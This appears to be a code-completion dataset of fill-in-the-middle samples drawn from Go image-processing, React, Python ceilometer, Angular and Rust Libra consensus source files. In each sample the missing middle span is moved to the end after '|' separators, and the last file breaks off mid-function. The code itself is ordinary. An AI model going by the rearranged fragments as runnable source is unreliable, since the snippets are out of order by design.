var shrink float64
srcW, srcH := float64(width), float64(height)
dstW, dstH := float64(po.Width), float64(po.Height)
if po.Width == 0 {
dstW = srcW
}
if po.Height == 0 {
dstH = srcH
}
if dstW == srcW && dstH == srcH {
shrink = 1
} else {
wshrink := srcW / dstW
hshrink := srcH / dstH
rt := po.ResizingType
if rt == resizeAuto {
srcD := width - height
dstD := po.Width - po.Height
if (srcD >= 0 && dstD >= 0) || (srcD < 0 && dstD < 0) {
rt = resizeFill
} else {
rt = resizeFit
}
}
switch {
case po.Width == 0:
shrink = hshrink
case po.Height == 0:
shrink = wshrink
case rt == resizeFit:
shrink = math.Max(wshrink, hshrink)
default:
shrink = math.Min(wshrink, hshrink)
}
}
if !po.Enlarge && shrink < 1 && imgtype != imageTypeSVG {
shrink = 1
}
shrink /= po.Dpr
if shrink > srcW {
shrink = srcW
}
if shrink > srcH {
shrink = srcH
}
return 1.0 / shrink
}
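// Worked example (illustrative numbers): a 1000x500 source resized with
// width=300, height=300, resizeFit and dpr=1 gives wshrink≈3.33, hshrink≈1.67,
// so shrink=max(3.33, 1.67)≈3.33 and the returned scale is 1/3.33 ≈ 0.3.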
func canScaleOnLoad(imgtype imageType, scale float64) bool {
if imgtype == imageTypeSVG {
return true
}
if conf.DisableShrinkOnLoad || scale >= 1 {
return false
}
return imgtype == imageTypeJPEG || imgtype == imageTypeWEBP
}
func canFitToBytes(imgtype imageType) bool {
switch imgtype {
case imageTypeJPEG, imageTypeWEBP, imageTypeAVIF, imageTypeTIFF:
return true
default:
return false
}
}
func calcJpegShink(scale float64, imgtype imageType) int {
shrink := int(1.0 / scale)
switch {
case shrink >= 8:
return 8
case shrink >= 4:
return 4
case shrink >= 2:
return 2
}
return 1
}
func calcCropSize(orig int, crop float64) int |
func calcPosition(width, height, innerWidth, innerHeight int, gravity *gravityOptions, allowOverflow bool) (left, top int) {
if gravity.Type == gravityFocusPoint {
pointX := scaleInt(width, gravity.X)
pointY := scaleInt(height, gravity.Y)
left = pointX - innerWidth/2
top = pointY - innerHeight/2
} else {
offX, offY := int(gravity.X), int(gravity.Y)
left = (width-innerWidth+1)/2 + offX
top = (height-innerHeight+1)/2 + offY
if gravity.Type == gravityNorth || gravity.Type == gravityNorthEast || gravity.Type == gravityNorthWest {
top = 0 + offY
}
if gravity.Type == gravityEast || gravity.Type == gravityNorthEast || gravity.Type == gravitySouthEast {
left = width - innerWidth - offX
}
if gravity.Type == gravitySouth || gravity.Type == gravitySouthEast || gravity.Type == gravitySouthWest {
top = height - innerHeight - offY
}
if gravity.Type == gravityWest || gravity.Type == gravityNorthWest || gravity.Type == gravitySouthWest {
left = 0 + offX
}
}
var minX, maxX, minY, maxY int
if allowOverflow {
minX, maxX = -innerWidth+1, width-1
minY, maxY = -innerHeight+1, height-1
} else {
minX, maxX = 0, width-innerWidth
minY, maxY = 0, height-innerHeight
}
left = maxInt(minX, minInt(left, maxX))
top = maxInt(minY, minInt(top, maxY))
return
}
func cropImage(img *vipsImage, cropWidth, cropHeight int, gravity *gravityOptions) error {
if cropWidth == 0 && cropHeight == 0 {
return nil
}
imgWidth, imgHeight := img.Width(), img.Height()
cropWidth = minNonZeroInt(cropWidth, imgWidth)
cropHeight = minNonZeroInt(cropHeight, imgHeight)
if cropWidth >= imgWidth && cropHeight >= imgHeight {
return nil
}
if gravity.Type == gravitySmart {
if err := img.CopyMemory(); err != nil {
return err
}
if err := img.SmartCrop(cropWidth, cropHeight); err != nil {
return err
}
// Applying additional modifications after smart crop causes SIGSEGV on Alpine
// so we have to copy memory after it
return img.CopyMemory()
}
left, top := calcPosition(imgWidth, imgHeight, cropWidth, cropHeight, gravity, false)
return img.Crop(left, top, cropWidth, cropHeight)
}
func prepareWatermark(wm *vipsImage, wmData *imageData, opts *watermarkOptions, imgWidth, imgHeight int) error {
if err := wm.Load(wmData.Data, wmData.Type, 1, 1.0, 1); err != nil {
return err
}
po := newProcessingOptions()
po.ResizingType = resizeFit
po.Dpr = 1
po.Enlarge = true
po.Format = wmData.Type
if opts.Scale > 0 {
po.Width = maxInt(scaleInt(imgWidth, opts.Scale), 1)
po.Height = maxInt(scaleInt(imgHeight, opts.Scale), 1)
}
if err := transformImage(context.Background(), wm, wmData.Data, po, wmData.Type); err != nil {
return err
}
if err := wm.EnsureAlpha(); err != nil {
return nil
}
if opts.Replicate {
return wm.Replicate(imgWidth, imgHeight)
}
left, top := calcPosition(imgWidth, imgHeight, wm.Width(), wm.Height(), &opts.Gravity, true)
return wm.Embed(imgWidth, imgHeight, left, top, rgbColor{0, 0, 0}, true)
}
func applyWatermark(img *vipsImage, wmData *imageData, opts *watermarkOptions, framesCount int) error {
if err := img.RgbColourspace(); err != nil {
return err
}
if err := img.CopyMemory(); err != nil {
return err
}
wm := new(vipsImage)
defer wm.Clear()
width := img.Width()
height := img.Height()
if err := prepareWatermark(wm, wmData, opts, width, height/framesCount); err != nil {
return err
}
if framesCount > 1 {
if err := wm.Replicate(width, height); err != nil {
return err
}
}
opacity := opts.Opacity * conf.WatermarkOpacity
return img.ApplyWatermark(wm, opacity)
}
func copyMemoryAndCheckTimeout(ctx context.Context, img *vipsImage) error {
err := img.CopyMemory()
checkTimeout(ctx)
return err
}
func transformImage(ctx context.Context, img *vipsImage, data []byte, po *processingOptions, imgtype imageType) error {
var (
err error
trimmed bool
)
if po.Trim.Enabled {
if err = img.Trim(po.Trim.Threshold, po.Trim.Smart, po.Trim.Color, po.Trim.EqualHor, po.Trim.EqualVer); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
trimmed = true
}
srcWidth, srcHeight, angle, flip := extractMeta(img, po.Rotate, po.AutoRotate)
cropWidth := calcCropSize(srcWidth, po.Crop.Width)
cropHeight := calcCropSize(srcHeight, po.Crop.Height)
cropGravity := po.Crop.Gravity
if cropGravity.Type == gravityUnknown {
cropGravity = po.Gravity
}
widthToScale := minNonZeroInt(cropWidth, srcWidth)
heightToScale := minNonZeroInt(cropHeight, srcHeight)
scale := calcScale(widthToScale, heightToScale, po, imgtype)
if cropWidth > 0 {
cropWidth = maxInt(1, scaleInt(cropWidth, scale))
}
if cropHeight > 0 {
cropHeight = maxInt(1, scaleInt(cropHeight, scale))
}
if cropGravity.Type != gravityFocusPoint {
cropGravity.X *= scale
cropGravity.Y *= scale
}
if !trimmed && scale != 1 && data != nil && canScaleOnLoad(imgtype, scale) {
jpegShrink := calcJpegShink(scale, imgtype)
if imgtype != imageTypeJPEG || jpegShrink != 1 {
// Do some scale-on-load
if err = img.Load(data, imgtype, jpegShrink, scale, 1); err != nil {
return err
}
}
// Update scale after scale-on-load
newWidth, newHeight, _, _ := extractMeta(img, po.Rotate, po.AutoRotate)
if srcWidth > srcHeight {
scale = float64(srcWidth) * scale / float64(newWidth)
} else {
scale = float64(srcHeight) * scale / float64(newHeight)
}
if srcWidth == scaleInt(srcWidth, scale) && srcHeight == scaleInt(srcHeight, scale) {
scale = 1.0
}
}
if err = img.Rad2Float(); err != nil {
return err
}
iccImported := false
convertToLinear := conf.UseLinearColorspace && scale != 1
if convertToLinear || !img.IsSRGB() {
if err = img.ImportColourProfile(); err != nil {
return err
}
iccImported = true
}
if convertToLinear {
if err = img.LinearColourspace(); err != nil {
return err
}
} else {
if err = img.RgbColourspace(); err != nil {
return err
}
}
hasAlpha := img.HasAlpha()
if scale != 1 {
if err = img.Resize(scale, hasAlpha); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if err = img.Rotate(angle); err != nil {
return err
}
if flip {
if err = img.Flip(); err != nil {
return err
}
}
if err = img.Rotate(po.Rotate); err != nil {
return err
}
dprWidth := scaleInt(po.Width, po.Dpr)
dprHeight := scaleInt(po.Height, po.Dpr)
if err = cropImage(img, cropWidth, cropHeight, &cropGravity); err != nil {
return err
}
if err = cropImage(img, dprWidth, dprHeight, &po.Gravity); err != nil {
return err
}
if po.Format == imageTypeWEBP {
webpLimitShrink := float64(maxInt(img.Width(), img.Height())) / webpMaxDimension
if webpLimitShrink > 1.0 {
if err = img.Resize(1.0/webpLimitShrink, hasAlpha); err != nil {
return err
}
logWarning("WebP dimension size is limited to %d. The image is rescaled to %dx%d", int(webpMaxDimension), img.Width(), img.Height())
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
}
}
keepProfile := !po.StripColorProfile && po.Format.SupportsColourProfile()
if iccImported {
if keepProfile {
// We imported ICC profile and want to keep it,
// so we need to export it
if err = img.ExportColourProfile(); err != nil {
return err
}
} else {
// We imported ICC profile but don't want to keep it,
// so we need to export image to sRGB for maximum compatibility
if err = img.ExportColourProfileToSRGB(); err != nil {
return err
}
}
} else if !keepProfile {
// We don't import ICC profile and don't want to keep it,
// so we need to transform it to sRGB for maximum compatibility
if err = img.TransformColourProfile(); err != nil {
return err
}
}
if err = img.RgbColourspace(); err != nil {
return err
}
if !keepProfile {
if err = img.RemoveColourProfile(); err != nil {
return err
}
}
transparentBg := po.Format.SupportsAlpha() && !po.Flatten
if hasAlpha && !transparentBg {
if err = img.Flatten(po.Background); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if po.Blur > 0 {
if err = img.Blur(po.Blur); err != nil {
return err
}
}
if po.Sharpen > 0 {
if err = img.Sharpen(po.Sharpen); err != nil {
return err
}
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
if po.Extend.Enabled && (dprWidth > img.Width() || dprHeight > img.Height()) {
offX, offY := calcPosition(dprWidth, dprHeight, img.Width(), img.Height(), &po.Extend.Gravity, false)
if err = img.Embed(dprWidth, dprHeight, offX, offY, po.Background, transparentBg); err != nil {
return err
}
}
if po.Padding.Enabled {
paddingTop := scaleInt(po.Padding.Top, po.Dpr)
paddingRight := scaleInt(po.Padding.Right, po.Dpr)
paddingBottom := scaleInt(po.Padding.Bottom, po.Dpr)
paddingLeft := scaleInt(po.Padding.Left, po.Dpr)
if err = img.Embed(
img.Width()+paddingLeft+paddingRight,
img.Height()+paddingTop+paddingBottom,
paddingLeft,
paddingTop,
po.Background,
transparentBg,
); err != nil {
return err
}
}
if po.Watermark.Enabled && watermark != nil {
if err = applyWatermark(img, watermark, &po.Watermark, 1); err != nil {
return err
}
}
if len(po.URLWatermarks) > 0 {
for _, v := range po.URLWatermarks {
if v.Enabled {
var imgData *imageData
if imgData, err = remoteImageData(v.ImageURL, "url_watermark"); err != nil {
return err
}
if err = applyWatermark(img, imgData, &v.watermarkOptions, 1); err != nil {
return err
}
}
}
}
if err = img.RgbColourspace(); err != nil {
return err
}
if err := img.CastUchar(); err != nil {
return err
}
if po.StripMetadata {
if err := img.Strip(); err != nil {
return err
}
}
return copyMemoryAndCheckTimeout(ctx, img)
}
func transformAnimated(ctx context.Context, img *vipsImage, data []byte, po *processingOptions, imgtype imageType) error {
if po.Trim.Enabled {
logWarning("Trim is not supported for animated images")
po.Trim.Enabled = false
}
imgWidth := img.Width()
frameHeight, err := img.GetInt("page-height")
if err != nil {
return err
}
framesCount := minInt(img.Height()/frameHeight, conf.MaxAnimationFrames)
// Double check dimensions because animated image has many frames
if err = checkDimensions(imgWidth, frameHeight*framesCount); err != nil {
return err
}
// Vips 8.8+ supports n-pages and doesn't load the whole animated image on header access
if nPages, _ := img.GetInt("n-pages"); nPages > framesCount {
// Load only the needed frames
if err = img.Load(data, imgtype, 1, 1.0, framesCount); err != nil {
return err
}
}
delay, err := img.GetInt("gif-delay")
if err != nil {
return err
}
loop, err := img.GetInt("gif-loop")
if err != nil {
return err
}
watermarkEnabled := po.Watermark.Enabled
po.Watermark.Enabled = false
defer func() { po.Watermark.Enabled = watermarkEnabled }()
anyUrlWatermarkEnabled := false
if len(po.URLWatermarks) > 0 {
urlWatermarksEnabled := make(map[int]bool)
for k, v := range po.URLWatermarks {
if v.Enabled {
anyUrlWatermarkEnabled = true
}
urlWatermarksEnabled[k] = v.Enabled
v.Enabled = false
}
defer func() {
for k, v := range urlWatermarksEnabled {
po.URLWatermarks[k].Enabled = v
}
}()
}
frames := make([]*vipsImage, framesCount)
defer func() {
for _, frame := range frames {
if frame != nil {
frame.Clear()
}
}
}()
for i := 0; i < framesCount; i++ {
frame := new(vipsImage)
if err = img.Extract(frame, 0, i*frameHeight, imgWidth, frameHeight); err != nil {
return err
}
frames[i] = frame
if err = transformImage(ctx, frame, nil, po, imgtype); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, frame); err != nil {
return err
}
}
if err = img.Arrayjoin(frames); err != nil {
return err
}
if watermarkEnabled && watermark != nil {
if err = applyWatermark(img, watermark, &po.Watermark, framesCount); err != nil {
return err
}
framesCount++
}
if len(po.URLWatermarks) > 0 && anyUrlWatermarkEnabled {
for _, v := range po.URLWatermarks {
if v.Enabled {
var imgData *imageData
if imgData, err = remoteImageData(v.ImageURL, "url_watermark"); err != nil {
return err
}
if err = applyWatermark(img, imgData, &v.watermarkOptions, framesCount); err != nil {
return err
}
framesCount++
}
}
}
if err = img.CastUchar(); err != nil {
return err
}
if err = copyMemoryAndCheckTimeout(ctx, img); err != nil {
return err
}
img.SetInt("page-height", frames[0].Height())
img.SetInt("gif-delay", delay)
img.SetInt("gif-loop", loop)
img.SetInt("n-pages", framesCount)
return nil
}
func getIcoData(imgdata *imageData) (*imageData, error) {
icoMeta, err := imagemeta.DecodeIcoMeta(bytes.NewReader(imgdata.Data))
if err != nil {
return nil, err
}
offset := icoMeta.BestImageOffset()
size := icoMeta.BestImageSize()
data := imgdata.Data[offset : offset+size]
var format string
meta, err := imagemeta.DecodeMeta(bytes.NewReader(data))
if err != nil {
// Looks like it's BMP with an incomplete header
if d, err := imagemeta.FixBmpHeader(data); err == nil {
format = "bmp"
data = d
} else {
return nil, err
}
} else {
format = meta.Format()
}
if imgtype, ok := imageTypes[format]; ok && vipsTypeSupportLoad[imgtype] {
return &imageData{
Data: data,
Type: imgtype,
}, nil
}
return nil, fmt.Errorf("Can't load %s from ICO", meta.Format())
}
func saveImageToFitBytes(po *processingOptions, img *vipsImage) ([]byte, context.CancelFunc, error) {
var diff float64
quality := po.getQuality()
img.CopyMemory()
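// Illustrative walk-through: with quality 80 and an encoded result twice MaxBytes,
// delta = 2.0 falls into the (1.5, 3] bucket below, so the next attempt uses
// quality 80 * 0.5 = 40; the loop stops once the result fits, quality drops to 10
// or below, or encoding fails.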
for {
result, cancel, err := img.Save(po.Format, quality)
if len(result) <= po.MaxBytes || quality <= 10 || err != nil {
return result, cancel, err
}
cancel()
delta := float64(len(result)) / float64(po.MaxBytes)
switch {
case delta > 3:
diff = 0.25
case delta > 1.5:
diff = 0.5
default:
diff = 0.75
}
quality = int(float64(quality) * diff)
}
}
func processImage(ctx context.Context) ([]byte, context.CancelFunc, error) {
runtime.LockOSThread()
defer runtime.UnlockOSThread()
if newRelicEnabled {
newRelicCancel := startNewRelicSegment(ctx, "Processing image")
defer newRelicCancel()
}
if prometheusEnabled {
defer startPrometheusDuration(prometheusProcessingDuration)()
}
defer vipsCleanup()
po := getProcessingOptions(ctx)
imgdata := getImageData(ctx)
switch {
case po.Format == imageTypeUnknown:
switch {
case po.PreferAvif && canSwitchFormat(imgdata.Type, imageTypeUnknown, imageTypeAVIF):
po.Format = imageTypeAVIF
case po.PreferWebP && canSwitchFormat(imgdata.Type, imageTypeUnknown, imageTypeWEBP):
po.Format = imageTypeWEBP
case imageTypeSaveSupport(imgdata.Type) && imageTypeGoodForWeb(imgdata.Type):
po.Format = imgdata.Type
default:
po.Format = imageTypeJPEG
}
case po.EnforceAvif && canSwitchFormat(imgdata.Type, po.Format, imageTypeAVIF):
po.Format = imageTypeAVIF
case po.EnforceWebP && canSwitchFormat(imgdata.Type, po.Format, imageTypeWEBP):
po.Format = imageTypeWEBP
}
if po.Format == imageTypeSVG {
if imgdata.Type != imageTypeSVG {
return []byte{}, func() {}, errConvertingNonSvgToSvg
}
return imgdata.Data, func() {}, nil
}
if imgdata.Type == imageTypeSVG && !vipsTypeSupportLoad[imageTypeSVG] {
return []byte{}, func() {}, errSourceImageTypeNotSupported
}
if imgdata.Type == imageTypeICO {
icodata, err := getIcoData(imgdata)
if err != nil {
return nil, func() {}, err
}
imgdata = icodata
}
if !vipsSupportSmartcrop {
if po.Gravity.Type == gravitySmart {
logWarning(msgSmartCropNotSupported)
po.Gravity.Type = gravityCenter
}
if po.Crop.Gravity.Type == gravitySmart {
logWarning(msgSmartCropNotSupported)
po.Crop.Gravity.Type = gravityCenter
}
}
if po.ResizingType == resizeCrop {
logWarning("`crop` resizing type is deprecated and will be removed in future versions. Use `crop` processing option instead")
po.Crop.Width, po.Crop.Height = float64(po.Width), float64(po.Height)
po.ResizingType = resizeFit
po.Width, po.Height = 0, 0
}
animationSupport := conf.MaxAnimationFrames > 1 && vipsSupportAnimation(imgdata.Type) && vipsSupportAnimation(po.Format)
pages := 1
if animationSupport {
pages = -1
}
img := new(vipsImage)
defer img.Clear()
if err := img.Load(imgdata.Data, imgdata.Type, 1, 1.0, pages); err != nil {
return nil, func() {}, err
}
if animationSupport && img.IsAnimated() {
if err := transformAnimated(ctx, img, imgdata.Data, po, imgdata.Type); err != nil {
return nil, func() {}, err
}
} else {
if err := transformImage(ctx, img, imgdata.Data, po, imgdata.Type); err != nil {
return nil, func() {}, err
}
}
if err := copyMemoryAndCheckTimeout(ctx, img); err != nil {
return nil, func() {}, err
}
if po.MaxBytes > 0 && canFitToBytes(po.Format) {
return saveImageToFitBytes(po, img)
}
po.Width, po.Height = img.Width(), img.Height()
return img.Save(po.Format, po.getQuality())
}
| {
switch {
case crop == 0.0:
return 0
case crop >= 1.0:
return int(crop)
default:
return maxInt(1, scaleInt(orig, crop))
}
} |
MoreButton.tsx | import React from "react";
import SpriteIcon from "../SpriteIcon";
interface MoreButtonProps { | }
const MoreButton: React.FC<MoreButtonProps> = (props) => {
return (
<div className="header-btn more-button svgOnHover" onClick={props.onClick}>
<SpriteIcon name="more" className="active" />
</div>
);
};
export default MoreButton; | onClick(): void; |
declarative.py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from jsonpath_rw_ext import parser
from oslo_log import log
import six
import yaml
from ceilometer.i18n import _
LOG = log.getLogger(__name__)
class DefinitionException(Exception):
def __init__(self, message, definition_cfg):
msg = '%s %s: %s' % (self.__class__.__name__, definition_cfg, message)
super(DefinitionException, self).__init__(msg)
self.brief_message = message
class MeterDefinitionException(DefinitionException):
pass
class EventDefinitionException(DefinitionException):
pass
class ResourceDefinitionException(DefinitionException):
pass
class Definition(object):
JSONPATH_RW_PARSER = parser.ExtentedJsonPathParser()
GETTERS_CACHE = {}
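# Illustrative shapes of the cfg argument handled below (hypothetical examples,
# not taken from the packaged definition files):
#   simple form:   "$.payload.instance_id"
#   extended form: {"fields": "$.payload.volume",
#                   "plugin": {"name": "<plugin_name>", "parameters": {...}}}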
def __init__(self, name, cfg, plugin_manager):
self.cfg = cfg
self.name = name
self.plugin = None
if isinstance(cfg, dict):
if 'fields' not in cfg:
raise DefinitionException(
_("The field 'fields' is required for %s") % name,
self.cfg)
if 'plugin' in cfg:
plugin_cfg = cfg['plugin']
if isinstance(plugin_cfg, six.string_types):
plugin_name = plugin_cfg
plugin_params = {}
else:
try:
plugin_name = plugin_cfg['name']
except KeyError:
raise DefinitionException(
_('Plugin specified, but no plugin name supplied '
'for %s') % name, self.cfg)
plugin_params = plugin_cfg.get('parameters')
if plugin_params is None:
plugin_params = {}
try:
plugin_ext = plugin_manager[plugin_name]
except KeyError:
raise DefinitionException(
_('No plugin named %(plugin)s available for '
'%(name)s') % dict(
plugin=plugin_name,
name=name), self.cfg)
plugin_class = plugin_ext.plugin
self.plugin = plugin_class(**plugin_params)
fields = cfg['fields']
else:
# Simple definition "foobar: jsonpath"
fields = cfg
if isinstance(fields, list):
# NOTE(mdragon): if not a string, we assume a list.
if len(fields) == 1:
fields = fields[0]
else:
fields = '|'.join('(%s)' % path for path in fields)
if isinstance(fields, six.integer_types):
self.getter = fields
else:
try:
self.getter = self.make_getter(fields)
except Exception as e:
raise DefinitionException(
_("Parse error in JSONPath specification "
"'%(jsonpath)s' for %(name)s: %(err)s")
% dict(jsonpath=fields, name=name, err=e), self.cfg)
def _get_path(self, match):
|
def parse(self, obj, return_all_values=False):
if callable(self.getter):
values = self.getter(obj)
else:
return self.getter
values = [match for match in values
if return_all_values or match.value is not None]
if self.plugin is not None:
if return_all_values and not self.plugin.support_return_all_values:
raise DefinitionException("Plugin %s don't allows to "
"return multiple values" %
self.cfg["plugin"]["name"], self.cfg)
values_map = [('.'.join(self._get_path(match)), match.value) for
match in values]
values = [v for v in self.plugin.trait_values(values_map)
if v is not None]
else:
values = [match.value for match in values if match is not None]
if return_all_values:
return values
else:
return values[0] if values else None
def make_getter(self, fields):
if fields in self.GETTERS_CACHE:
return self.GETTERS_CACHE[fields]
else:
getter = self.JSONPATH_RW_PARSER.parse(fields).find
self.GETTERS_CACHE[fields] = getter
return getter
def load_definitions(conf, defaults, config_file, fallback_file=None):
"""Setup a definitions from yaml config file."""
if not os.path.exists(config_file):
config_file = conf.find_file(config_file)
if not config_file and fallback_file is not None:
LOG.debug("No Definitions configuration file found! "
"Using default config.")
config_file = fallback_file
if config_file is not None:
LOG.debug("Loading definitions configuration file: %s", config_file)
with open(config_file) as cf:
config = cf.read()
try:
definition_cfg = yaml.safe_load(config)
except yaml.YAMLError as err:
if hasattr(err, 'problem_mark'):
mark = err.problem_mark
errmsg = (_("Invalid YAML syntax in Definitions file "
"%(file)s at line: %(line)s, column: %(column)s.")
% dict(file=config_file,
line=mark.line + 1,
column=mark.column + 1))
else:
errmsg = (_("YAML error reading Definitions file "
"%(file)s")
% dict(file=config_file))
LOG.error(errmsg)
raise
else:
LOG.debug("No Definitions configuration file found! "
"Using default config.")
definition_cfg = defaults
LOG.debug("Definitions: %s", definition_cfg)
return definition_cfg
| if match.context is not None:
for path_element in self._get_path(match.context):
yield path_element
yield str(match.path) |
compiler_host.ts | /**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import ts from 'typescript';
import {CompilerHost, CompilerOptions} from './api';
let wrapHostForTest: ((host: ts.CompilerHost) => ts.CompilerHost)|null = null;
export function | (wrapFn: ((host: ts.CompilerHost) => ts.CompilerHost)|
null): void {
wrapHostForTest = wrapFn;
}
export function createCompilerHost(
{options, tsHost = ts.createCompilerHost(options, true)}:
{options: CompilerOptions, tsHost?: ts.CompilerHost}): CompilerHost {
if (wrapHostForTest !== null) {
tsHost = wrapHostForTest(tsHost);
}
return tsHost;
}
| setWrapHostForTest |
network.rs | // Copyright (c) The Libra Core Contributors
// SPDX-License-Identifier: Apache-2.0
use crate::{
counters,
network_interface::{ConsensusMsg, ConsensusNetworkEvents, ConsensusNetworkSender},
};
use anyhow::{anyhow, ensure};
use bytes::Bytes;
use channel::{self, libra_channel, message_queues::QueueStyle};
use consensus_types::{
block_retrieval::{BlockRetrievalRequest, BlockRetrievalResponse},
common::Author,
proposal_msg::ProposalMsg,
sync_info::SyncInfo,
vote_msg::VoteMsg,
};
use futures::{channel::oneshot, stream::select, SinkExt, Stream, StreamExt, TryStreamExt};
use libra_logger::prelude::*;
use libra_metrics::monitor;
use libra_security_logger::{security_log, SecurityEvent};
use libra_types::{
account_address::AccountAddress, epoch_change::EpochChangeProof,
validator_verifier::ValidatorVerifier,
};
use network::protocols::{network::Event, rpc::error::RpcError};
use std::{
mem::{discriminant, Discriminant},
num::NonZeroUsize,
time::Duration,
};
/// The block retrieval request is used internally for implementing RPC: the callback is executed
/// for carrying the response
#[derive(Debug)]
pub struct IncomingBlockRetrievalRequest {
pub req: BlockRetrievalRequest,
pub response_sender: oneshot::Sender<Result<Bytes, RpcError>>,
}
/// Just a convenience struct to keep all the network proxy receiving queues in one place.
/// Will be returned by the NetworkTask upon startup.
pub struct NetworkReceivers {
/// Provide a LIFO buffer for each (Author, MessageType) key
pub consensus_messages: libra_channel::Receiver<
(AccountAddress, Discriminant<ConsensusMsg>),
(AccountAddress, ConsensusMsg),
>,
pub block_retrieval: libra_channel::Receiver<AccountAddress, IncomingBlockRetrievalRequest>,
}
/// Implements the actual networking support for all consensus messaging.
#[derive(Clone)]
pub struct NetworkSender {
author: Author,
network_sender: ConsensusNetworkSender,
// Self sender and self receivers provide a shortcut for sending the messages to itself.
// (self sending is not supported by the networking API).
// Note that we do not support self rpc requests as it might cause infinite recursive calls.
self_sender: channel::Sender<anyhow::Result<Event<ConsensusMsg>>>,
validators: ValidatorVerifier,
}
impl NetworkSender {
pub fn new(
author: Author,
network_sender: ConsensusNetworkSender,
self_sender: channel::Sender<anyhow::Result<Event<ConsensusMsg>>>,
validators: ValidatorVerifier,
) -> Self {
NetworkSender {
author,
network_sender,
self_sender,
validators,
}
}
/// Tries to retrieve num of blocks backwards starting from id from the given peer: the function
/// returns a future that is fulfilled with BlockRetrievalResponse.
pub async fn request_block(
&mut self,
retrieval_request: BlockRetrievalRequest,
from: Author,
timeout: Duration,
) -> anyhow::Result<BlockRetrievalResponse> {
ensure!(from != self.author, "Retrieve block from self");
let msg = ConsensusMsg::BlockRetrievalRequest(Box::new(retrieval_request.clone()));
let response_msg = monitor!(
"block_retrieval",
self.network_sender.send_rpc(from, msg, timeout).await?
);
let response = match response_msg {
ConsensusMsg::BlockRetrievalResponse(resp) => *resp,
_ => return Err(anyhow!("Invalid response to request")),
};
response
.verify(
retrieval_request.block_id(),
retrieval_request.num_blocks(),
&self.validators,
)
.map_err(|e| {
security_log(SecurityEvent::InvalidRetrievedBlock)
.error(&e)
.data(&response)
.log();
e
})?;
Ok(response)
}
/// Tries to send the given proposal (block and proposer metadata) to all the participants.
/// A validator on the receiving end is going to be notified about a new proposal in the
/// proposal queue.
///
/// The future is fulfilled as soon as the message is put into the internal mpsc channel to the
/// network (to provide back pressure); it does not indicate that the message has been delivered
/// or sent out. There is no indication of when the message reaches the recipients, nor of any
/// network failures.
pub async fn broadcast_proposal(&mut self, proposal: ProposalMsg) {
let msg = ConsensusMsg::ProposalMsg(Box::new(proposal));
// counters::UNWRAPPED_PROPOSAL_SIZE_BYTES.observe(msg.message.len() as f64);
self.broadcast(msg).await
}
async fn broadcast(&mut self, msg: ConsensusMsg) {
// Directly send the message to ourself without going through network.
let self_msg = Event::Message((self.author, msg.clone()));
if let Err(err) = self.self_sender.send(Ok(self_msg)).await {
error!("Error broadcasting to self: {:?}", err);
}
// Get the list of validators excluding our own account address. Note the
// ordering is not important in this case.
let self_author = self.author;
let other_validators = self
.validators
.get_ordered_account_addresses_iter()
.filter(|author| author != &self_author);
// Broadcast message over direct-send to all other validators.
if let Err(err) = self.network_sender.send_to_many(other_validators, msg) {
error!("Error broadcasting message: {:?}", err);
}
}
/// Sends the vote to the chosen recipients (typically that would be the recipients that
/// we believe could serve as proposers in the next round). The recipients on the receiving
/// end are going to be notified about a new vote in the vote queue.
///
/// The future is fulfilled as soon as the message is put into the internal mpsc channel to the
/// network (to provide back pressure); it does not indicate that the message has been delivered
/// or sent out. There is no indication of when the message reaches the recipients, nor of any
/// network failures.
pub async fn send_vote(&self, vote_msg: VoteMsg, recipients: Vec<Author>) {
let mut network_sender = self.network_sender.clone();
let mut self_sender = self.self_sender.clone();
let msg = ConsensusMsg::VoteMsg(Box::new(vote_msg));
for peer in recipients {
if self.author == peer {
let self_msg = Event::Message((self.author, msg.clone()));
if let Err(err) = self_sender.send(Ok(self_msg)).await {
error!("Error delivering a self vote: {:?}", err);
}
continue;
}
if let Err(e) = network_sender.send_to(peer, msg.clone()) {
error!("Failed to send a vote to peer {:?}: {:?}", peer, e);
}
}
}
/// Broadcasts vote message to all validators
pub async fn broadcast_vote(&mut self, vote_msg: VoteMsg) {
let msg = ConsensusMsg::VoteMsg(Box::new(vote_msg));
self.broadcast(msg).await
}
/// Sends the given sync info to the given author.
/// The future is fulfilled as soon as the message is added to the internal network channel
/// (does not indicate whether the message is delivered or sent out).
pub fn send_sync_info(&self, sync_info: SyncInfo, recipient: Author) {
let msg = ConsensusMsg::SyncInfo(Box::new(sync_info));
let mut network_sender = self.network_sender.clone();
if let Err(e) = network_sender.send_to(recipient, msg) {
warn!(
"Failed to send a sync info msg to peer {:?}: {:?}",
recipient, e
);
}
}
/// Broadcast about epoch changes with proof to the current validator set (including self)
/// when we commit the reconfiguration block
pub async fn broadcast_epoch_change(&mut self, proof: EpochChangeProof) {
let msg = ConsensusMsg::EpochChangeProof(Box::new(proof));
self.broadcast(msg).await
}
pub async fn notify_epoch_change(&mut self, proof: EpochChangeProof) {
let msg = ConsensusMsg::EpochChangeProof(Box::new(proof));
let self_msg = Event::Message((self.author, msg));
if let Err(e) = self.self_sender.send(Ok(self_msg)).await {
warn!("Failed to notify to self an epoch change {:?}", e);
}
}
}
pub struct NetworkTask {
consensus_messages_tx: libra_channel::Sender<
(AccountAddress, Discriminant<ConsensusMsg>),
(AccountAddress, ConsensusMsg),
>,
block_retrieval_tx: libra_channel::Sender<AccountAddress, IncomingBlockRetrievalRequest>,
all_events: Box<dyn Stream<Item = anyhow::Result<Event<ConsensusMsg>>> + Send + Unpin>,
}
impl NetworkTask {
/// Establishes the initial connections with the peers and returns the receivers.
pub fn new(
network_events: ConsensusNetworkEvents,
